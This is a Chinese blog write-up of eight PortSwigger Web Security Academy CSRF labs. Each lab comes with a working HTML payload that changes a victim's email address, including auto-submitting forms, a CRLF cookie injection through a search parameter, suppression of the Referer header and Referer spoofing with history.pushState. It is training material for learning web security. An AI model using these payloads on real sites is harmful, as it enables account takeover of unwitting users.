portswigger靶场CSRF攻击实验

发布于 2022年 05月 19日 17:42

portswigger靶场CSRF实验

实验一、没有防御的csrf

靶场

no-defenses

说明

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

题解

在exploit server body中提交此代码

<form method='POST' action='https://acde1fc31ec13a0dc07001cb00ee0021.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
	document.forms[0].submit()
</script>

实验二、token验证基于请求方法的csrf

靶场

token-validation-depends-on-request-method

说明

This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

题解

与上题相似,请求方法为POST的时候会验证csrf,尝试修改请求方法为GET,成功

<form method='GET' action='https://acde1fc31ec13a0dc07001cb00ee0021.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
	document.forms[0].submit()
</script>

实验三、token验证基于其是否存在的csrf

靶场

token-validation-depends-on-token-being-present

说明

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

题解

掩耳盗铃鸵鸟题,不交csrf就不会验证(

<form method='POST' action='https://ac591f121eb7d5edc010564800fd0065.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
	document.forms[0].submit()
</script>

实验四、token和seession无联系的csrf

靶场

token-not-tied-to-user-session

说明

This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

wiener:peter
carlos:montoya

题解

分别登录两个账号,观察其csrf token

wiener:NeoFBNVGzJ4WSZ9n6ILgIgRb4JoSrVDs

carlos:A6WdJmuOtcyIHypJOzLUy4ajiobIMiJk

没有发现什么关联,在carlos账号下尝试使用wiener的csrf token提交修改,成功。

重复此操作,失败,猜想csrf token有一次性,阅后即焚

<form method='GET' action='https://acdd1fd01e2f7e32c0cc0ce800180066.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='0tN5lxMWb84fEo6zRF9uD6afduAZ6ube'>
</form>
<script>
	document.forms[0].submit()
</script>

实验五、token和cookie(与user seesion无关)有联系的csrf

靶场

token-tied-to-non-session-cookie

说明

This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

wiener:peter
carlos:montoya

题解

login页面 观察Response Headers

Set-Cookie: csrfkey=aZJsgXBEJsomTOPLraWieagM2XTqAkSE

csrf token: prLP0aZnkcH5TstFljVHs1D9dd68K13E

csrf对应set-cookie的csrfkey值

<form method='POST' action='https://ac871f561e71b4bfc0f3546f008400ce.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='prLP0aZnkcH5TstFljVHs1D9dd68K13E'>
</form>
<img src="https://ac871f561e71b4bfc0f3546f008400ce.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=aZJsgXBEJsomTOPLraWieagM2XTqAkSE" onerror="document.forms[0].submit()">

实验六、token被复制在cookie的csrf

靶场

token-duplicated-in-cookie

说明

This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

题解

与上题类似,csrf token直接存储在cookie里,发起Set-Cookie请求修改cookie值

<form method='POST' action='https://acf81f221fbc9bc3c0212ef400b3007f.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='csrf'>
</form>
<img src="https://acf81f221fbc9bc3c0212ef400b3007f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=csrf" onerror="document.forms[0].submit()">

实验七、Referer验证取决于请求头中该字段是否存在的csrf

靶场

referer-validation-depends-on-header-being-present

说明

This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

题解

Referrer Policy:请求的报头中,会包含一个 Referrer,用以指定该请求是从哪个页面跳转页来的,常被用于分析用户来源等信息,但是也有成为用户的一个不安全因素

在页面添加no-referrer,不传递Referrer,绕过referer验证

<meta name='Referrer' content='no-referrer'>
<form method='POST' action='https://ac5c1f911eff3a8ec1a3ba80006a00b1.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
	document.forms[0].submit()
</script>

实验八、使用辣鸡方法验证Referer的csrf

靶场

referer-validation-broken

说明

This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

题解

此靶场在referer中匹配期望的字符串,只要在referer中随意插入一段其所期望的referer即可绕过

history.pushState向浏览器写入浏览记录,伪造referer,header中设置Referrer-Policy为unsafe-url阻止浏览器自动去除伪造的referer

head:

Referrer-Policy: unsafe-url

body:

<meta name='Referrer' content='unsafe-url'>
<form method='POST' action='https://ac611f301f6d4603c0902acb00e200aa.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    history.pushState("", "", "/?ac611f301f6d4603c0902acb00e200aa.web-security-academy.net")
	document.forms[0].submit()
</script>

推荐文章